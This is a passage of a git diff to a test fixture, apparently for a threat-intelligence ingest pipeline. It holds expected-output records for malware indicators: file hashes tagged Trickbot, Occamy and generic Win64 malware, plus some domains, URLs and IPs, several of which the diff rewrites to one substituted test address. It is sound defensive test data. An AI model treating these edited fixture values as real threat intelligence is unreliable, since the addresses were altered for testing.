+{"indicator":"89.160.20.156","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2189036446} +{"indicator":"89.160.20.156","description":null,"title":null,"content":"","type":"IPv4","id":2190596263} {"indicator":"10ec3571596c30b9993b89f12d29d23c","description":"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","title":"xor_0x20_xord_javascript","content":"","type":"FileHash-MD5","id":2192837907} {"id":73,"indicator":"http://www.playboysplus.com","type":"URL","title":null,"description":null,"content":""} {"id":74,"indicator":"http://join.playboysplus.com/signup/","type":"URL","title":null,"description":null,"content":""} diff --git a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json index a249c4d24e4..3bdbae126df 100644 --- a/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json +++ b/packages/ti_otx/data_stream/threat/_dev/test/pipeline/test-otx-sample-ndjson.log-expected.json @@ -8,12 +8,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "86.104.194.30" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549599093Z", - "original": "{\"indicator\":\"86.104.194.30\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1588938}", + "ingested": "2021-12-09T13:49:09.053417Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1588938}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -41,7 +41,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549639819Z", + "ingested": "2021-12-09T13:49:09.053426200Z", "original": "{\"indicator\":\"90421f8531f963d81cf54245b72cde80\",\"description\":\"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65\",\"title\":\"Win32:Hoblig-B\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":9751110}", "category": "threat", "type": "indicator", @@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549647564Z", + "ingested": "2021-12-09T13:49:09.053432600Z", "original": "{\"indicator\":\"ip.anysrc.net\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"hostname\",\"id\":16782717}", "category": "threat", "type": "indicator", @@ -83,12 +83,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "107.173.58.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549653645Z", - "original": "{\"indicator\":\"107.173.58.176\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":19901748}", + "ingested": "2021-12-09T13:49:09.053438600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":19901748}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -113,7 +113,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549659947Z", + "ingested": "2021-12-09T13:49:09.053444600Z", "original": "{\"indicator\":\"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":31612067}", "category": "threat", "type": "indicator", @@ -141,7 +141,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549665437Z", + "ingested": "2021-12-09T13:49:09.053450600Z", "original": "{\"indicator\":\"f8e58af3ffefd4037fef246e93a55dc8\",\"description\":\"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09\",\"title\":null,\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":34413770}", "category": "threat", "type": "indicator", @@ -167,7 +167,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549670838Z", + "ingested": "2021-12-09T13:49:09.053456600Z", "original": "{\"indicator\":\"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":111154034}", "category": "threat", "type": "indicator", @@ -195,7 +195,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549676488Z", + "ingested": "2021-12-09T13:49:09.053462500Z", "original": "{\"indicator\":\"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":151858953}", "category": "threat", "type": "indicator", @@ -213,12 +213,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "213.252.244.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549681938Z", - "original": "{\"indicator\":\"213.252.244.38\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":311294364}", + "ingested": "2021-12-09T13:49:09.053468600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":311294364}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -243,7 +243,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549687529Z", + "ingested": "2021-12-09T13:49:09.053474100Z", "original": "{\"indicator\":\"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":406540408}", "category": "threat", "type": "indicator", @@ -269,7 +269,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549710542Z", + "ingested": "2021-12-09T13:49:09.053477700Z", "original": "{\"indicator\":\"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":565556753}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549719689Z", + "ingested": "2021-12-09T13:49:09.053482700Z", "original": "{\"indicator\":\"aeb08b0651bc8a13dcf5e5f6c0d482f8\",\"description\":\"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6\",\"title\":null,\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":565556755}", "category": "threat", "type": "indicator", @@ -323,7 +323,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549725721Z", + "ingested": "2021-12-09T13:49:09.053488100Z", "original": "{\"indicator\":\"6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":575672549}", "category": "threat", "type": "indicator", @@ -349,7 +349,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549730770Z", + "ingested": "2021-12-09T13:49:09.053493300Z", "original": "{\"indicator\":\"c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":575672550}", "category": "threat", "type": "indicator", @@ -375,7 +375,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549735619Z", + "ingested": "2021-12-09T13:49:09.053497600Z", "original": "{\"indicator\":\"e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":995160791}", "category": "threat", "type": "indicator", @@ -401,7 +401,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549740198Z", + "ingested": "2021-12-09T13:49:09.053501600Z", "original": "{\"indicator\":\"d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1011989699}", "category": "threat", "type": "indicator", @@ -427,7 +427,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549745658Z", + "ingested": "2021-12-09T13:49:09.053505800Z", "original": "{\"indicator\":\"70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1011989701}", "category": "threat", "type": "indicator", @@ -456,7 +456,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549750327Z", + "ingested": "2021-12-09T13:49:09.053509400Z", "original": "{\"indicator\":\"29340643ca2e6677c19e1d3bf351d654\",\"description\":\"MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472176322}", "category": "threat", "type": "indicator", @@ -485,7 +485,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549754745Z", + "ingested": "2021-12-09T13:49:09.053514100Z", "original": "{\"indicator\":\"86c314bc2dc37ba84f7364acd5108c2b\",\"description\":\"MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457325}", "category": "threat", "type": "indicator", @@ -514,7 +514,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549760456Z", + "ingested": "2021-12-09T13:49:09.053520100Z", "original": "{\"indicator\":\"cb0c1248d3899358a375888bb4e8f3fe\",\"description\":\"MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457326}", "category": "threat", "type": "indicator", @@ -543,7 +543,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549766748Z", + "ingested": "2021-12-09T13:49:09.053526100Z", "original": "{\"indicator\":\"d348f536e214a47655af387408b4fca5\",\"description\":\"MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1472457327}", "category": "threat", "type": "indicator", @@ -571,7 +571,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549771607Z", + "ingested": "2021-12-09T13:49:09.053532Z", "original": "{\"indicator\":\"29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413\",\"description\":null,\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012751}", "category": "threat", "type": "indicator", @@ -597,7 +597,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549777438Z", + "ingested": "2021-12-09T13:49:09.053538100Z", "original": "{\"indicator\":\"b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012939}", "category": "threat", "type": "indicator", @@ -623,7 +623,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549782046Z", + "ingested": "2021-12-09T13:49:09.053544400Z", "original": "{\"indicator\":\"e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1546012967}", "category": "threat", "type": "indicator", @@ -651,7 +651,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549786915Z", + "ingested": "2021-12-09T13:49:09.053550400Z", "original": "{\"indicator\":\"465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"description\":null,\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1564141498}", "category": "threat", "type": "indicator", @@ -677,7 +677,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549792276Z", + "ingested": "2021-12-09T13:49:09.053556500Z", "original": "{\"indicator\":\"5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1564141523}", "category": "threat", "type": "indicator", @@ -706,7 +706,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549797836Z", + "ingested": "2021-12-09T13:49:09.053562500Z", "original": "{\"indicator\":\"14b74cb9be8cad8eb5fa8842d00bb692\",\"description\":\"MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1564142109}", "category": "threat", "type": "indicator", @@ -735,7 +735,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549802605Z", + "ingested": "2021-12-09T13:49:09.053568400Z", "original": "{\"indicator\":\"a5b59f7d133e354dfc73f40517aab730f322f0ef\",\"description\":\"SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa\",\"title\":\"Win.Malware.TrickbotSystemInfo-6335590-0\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1564142964}", "category": "threat", "type": "indicator", @@ -761,7 +761,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549807584Z", + "ingested": "2021-12-09T13:49:09.053574300Z", "original": "{\"indicator\":\"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1566067095}", "category": "threat", "type": "indicator", @@ -790,7 +790,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549812183Z", + "ingested": "2021-12-09T13:49:09.053580300Z", "original": "{\"indicator\":\"ff2dcea4963e060a658f4dffbb119529\",\"description\":\"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b\",\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1566999970}", "category": "threat", "type": "indicator", @@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549816501Z", + "ingested": "2021-12-09T13:49:09.053586200Z", "original": "{\"indicator\":\"0d73f1a1c4b2f8723fffc83eb3d00f31\",\"description\":\"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413\",\"title\":\"vad_contains_network_strings\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":1569290125}", "category": "threat", "type": "indicator", @@ -837,12 +837,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "185.25.50.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549823224Z", - "original": "{\"indicator\":\"185.25.50.167\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1592876453}", + "ingested": "2021-12-09T13:49:09.053592300Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1592876453}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -867,7 +867,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549828203Z", + "ingested": "2021-12-09T13:49:09.053598300Z", "original": "{\"indicator\":\"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1597058431}", "category": "threat", "type": "indicator", @@ -893,7 +893,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549833323Z", + "ingested": "2021-12-09T13:49:09.053604200Z", "original": "{\"indicator\":\"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1603343478}", "category": "threat", "type": "indicator", @@ -921,7 +921,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549839103Z", + "ingested": "2021-12-09T13:49:09.053610400Z", "original": "{\"indicator\":\"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"description\":null,\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260302}", "category": "threat", "type": "indicator", @@ -949,7 +949,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549843782Z", + "ingested": "2021-12-09T13:49:09.053616400Z", "original": "{\"indicator\":\"3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260304}", "category": "threat", "type": "indicator", @@ -975,7 +975,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549848311Z", + "ingested": "2021-12-09T13:49:09.053622500Z", "original": "{\"indicator\":\"b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260305}", "category": "threat", "type": "indicator", @@ -1003,7 +1003,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549853460Z", + "ingested": "2021-12-09T13:49:09.053626800Z", "original": "{\"indicator\":\"113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260310}", "category": "threat", "type": "indicator", @@ -1031,7 +1031,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549858440Z", + "ingested": "2021-12-09T13:49:09.053631500Z", "original": "{\"indicator\":\"9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260311}", "category": "threat", "type": "indicator", @@ -1057,7 +1057,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549867136Z", + "ingested": "2021-12-09T13:49:09.053636700Z", "original": "{\"indicator\":\"c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":1606260316}", "category": "threat", "type": "indicator", @@ -1086,7 +1086,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549871995Z", + "ingested": "2021-12-09T13:49:09.053641800Z", "original": "{\"indicator\":\"ad20c6fac565f901c82a21b70f9739037eb54818\",\"description\":\"SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260341}", "category": "threat", "type": "indicator", @@ -1115,7 +1115,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549876143Z", + "ingested": "2021-12-09T13:49:09.053646100Z", "original": "{\"indicator\":\"13f11e273f9a4a56557f03821c3bfd591cca6ebc\",\"description\":\"SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260344}", "category": "threat", "type": "indicator", @@ -1144,7 +1144,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549880882Z", + "ingested": "2021-12-09T13:49:09.053650100Z", "original": "{\"indicator\":\"1581fe76e3c96dc33182daafd09c8cf5c17004e0\",\"description\":\"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec\",\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260353}", "category": "threat", "type": "indicator", @@ -1173,7 +1173,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549885030Z", + "ingested": "2021-12-09T13:49:09.053654300Z", "original": "{\"indicator\":\"b72e75e9e901a44b655a5cf89cf0eadcaff46037\",\"description\":\"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260364}", "category": "threat", "type": "indicator", @@ -1197,7 +1197,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549889438Z", + "ingested": "2021-12-09T13:49:09.053657900Z", "original": "{\"indicator\":\"maper.info\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":1634015726}", "category": "threat", "type": "indicator", @@ -1215,12 +1215,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "213.252.244.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549893776Z", - "original": "{\"indicator\":\"213.252.244.126\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1635374317}", + "ingested": "2021-12-09T13:49:09.053662800Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1635374317}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1237,12 +1237,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "78.129.139.131" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549897964Z", - "original": "{\"indicator\":\"78.129.139.131\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1756014820}", + "ingested": "2021-12-09T13:49:09.053669Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1756014820}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1269,7 +1269,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549901881Z", + "ingested": "2021-12-09T13:49:09.053675Z", "original": "{\"indicator\":\"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543412}", "category": "threat", "type": "indicator", @@ -1297,7 +1297,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549905849Z", + "ingested": "2021-12-09T13:49:09.053681Z", "original": "{\"indicator\":\"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543416}", "category": "threat", "type": "indicator", @@ -1325,7 +1325,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549909856Z", + "ingested": "2021-12-09T13:49:09.053687Z", "original": "{\"indicator\":\"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543440}", "category": "threat", "type": "indicator", @@ -1353,7 +1353,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549913834Z", + "ingested": "2021-12-09T13:49:09.053693300Z", "original": "{\"indicator\":\"dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543441}", "category": "threat", "type": "indicator", @@ -1381,7 +1381,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549917751Z", + "ingested": "2021-12-09T13:49:09.053699300Z", "original": "{\"indicator\":\"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543445}", "category": "threat", "type": "indicator", @@ -1409,7 +1409,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549921668Z", + "ingested": "2021-12-09T13:49:09.053705300Z", "original": "{\"indicator\":\"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543456}", "category": "threat", "type": "indicator", @@ -1437,7 +1437,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549925686Z", + "ingested": "2021-12-09T13:49:09.053711200Z", "original": "{\"indicator\":\"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543458}", "category": "threat", "type": "indicator", @@ -1455,12 +1455,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "103.13.67.4" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549929623Z", - "original": "{\"indicator\":\"103.13.67.4\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754074}", + "ingested": "2021-12-09T13:49:09.053717200Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754074}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1477,12 +1477,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "80.90.87.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549933541Z", - "original": "{\"indicator\":\"80.90.87.201\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754077}", + "ingested": "2021-12-09T13:49:09.053723100Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754077}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1499,12 +1499,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "80.80.163.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549937418Z", - "original": "{\"indicator\":\"80.80.163.182\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754078}", + "ingested": "2021-12-09T13:49:09.053729Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754078}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1521,12 +1521,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "91.187.114.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549941656Z", - "original": "{\"indicator\":\"91.187.114.210\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754080}", + "ingested": "2021-12-09T13:49:09.053735Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754080}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1543,12 +1543,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "170.238.117.187" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549945513Z", - "original": "{\"indicator\":\"170.238.117.187\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2117062744}", + "ingested": "2021-12-09T13:49:09.053741100Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2117062744}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1573,7 +1573,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549949410Z", + "ingested": "2021-12-09T13:49:09.053747100Z", "original": "{\"indicator\":\"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2117884668}", "category": "threat", "type": "indicator", @@ -1591,12 +1591,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "103.84.238.3" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549953378Z", - "original": "{\"indicator\":\"103.84.238.3\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2119746545}", + "ingested": "2021-12-09T13:49:09.053769400Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2119746545}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1613,12 +1613,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "179.43.158.171" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549957335Z", - "original": "{\"indicator\":\"179.43.158.171\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2129763785}", + "ingested": "2021-12-09T13:49:09.053775700Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2129763785}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1635,12 +1635,12 @@ "threat": { 